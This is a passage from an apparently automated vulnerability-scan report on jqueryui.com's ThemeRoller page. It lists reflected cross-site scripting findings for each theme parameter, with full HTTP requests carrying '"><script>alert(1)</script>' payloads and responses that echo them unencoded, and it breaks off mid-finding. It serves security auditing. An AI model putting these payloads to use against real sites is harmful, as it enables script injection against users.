Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbcfa"><script>alert(1)</script>b9131c7690b was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadadafbcfa"><script>alert(1)</script>b9131c7690b&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadadafbcfa"><script>alert(1)</script>b9131c7690b&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&
...[SNIP]...

2.32. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6d67"><script>alert(1)</script>7e0b5c6406d was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaae6d67"><script>alert(1)</script>7e0b5c6406d&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaae6d67"><script>alert(1)</script>7e0b5c6406d&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

2.33. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c7b8"><script>alert(1)</script>81f4ae42993 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa6c7b8"><script>alert(1)</script>81f4ae42993&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
oft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa6c7b8"><script>alert(1)</script>81f4ae42993&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.34. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e8e9"><script>alert(1)</script>bc1b48b47cf was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=756e8e9"><script>alert(1)</script>bc1b48b47cf&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=756e8e9"><script>alert(1)</script>bc1b48b47cf&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColo
...[SNIP]...

2.35. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 446c7"><script>alert(1)</script>22b07013f0d was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75446c7"><script>alert(1)</script>22b07013f0d&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75446c7"><script>alert(1)</script>22b07013f0d&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconCo
...[SNIP]...

2.36. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3477"><script>alert(1)</script>00ee690a072 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75a3477"><script>alert(1)</script>00ee690a072&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75a3477"><script>alert(1)</script>00ee690a072&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=4
...[SNIP]...

2.37. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied, without encoding, into an HTML tag attribute value enclosed in double quotation marks. The payload 2a648"><script>alert(1)</script>1c587b6ed83 was submitted in the bgImgOpacityError parameter and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=952a648"><script>alert(1)</script>1c587b6ed83&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
TextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=952a648"><script>alert(1)</script>1c587b6ed83&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

2.38. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied, without encoding, into an HTML tag attribute value enclosed in double quotation marks. The payload c31b7"><script>alert(1)</script>1e318d1330f was submitted in the bgImgOpacityHeader parameter and was echoed unmodified in the application's response. The response snippet below shows the sink: the entire theme query string is re-emitted into a URL for /parseTheme.css.php?ctl=themeroller, which is why every theme parameter on this page reflects into the same attribute.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75c31b7"><script>alert(1)</script>1e318d1330f&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75c31b7"><script>alert(1)</script>1e318d1330f&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=22
...[SNIP]...

2.39. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied, without encoding, into an HTML tag attribute value enclosed in double quotation marks. The payload 6071a"><script>alert(1)</script>90cbce80a0e was submitted in the bgImgOpacityHighlight parameter and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=556071a"><script>alert(1)</script>90cbce80a0e&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
extureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=556071a"><script>alert(1)</script>90cbce80a0e&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError
...[SNIP]...

2.40. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied, without encoding, into an HTML tag attribute value enclosed in double quotation marks. The payload 9d510"><script>alert(1)</script>ecb5ac790e0 was submitted in the bgImgOpacityHover parameter and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

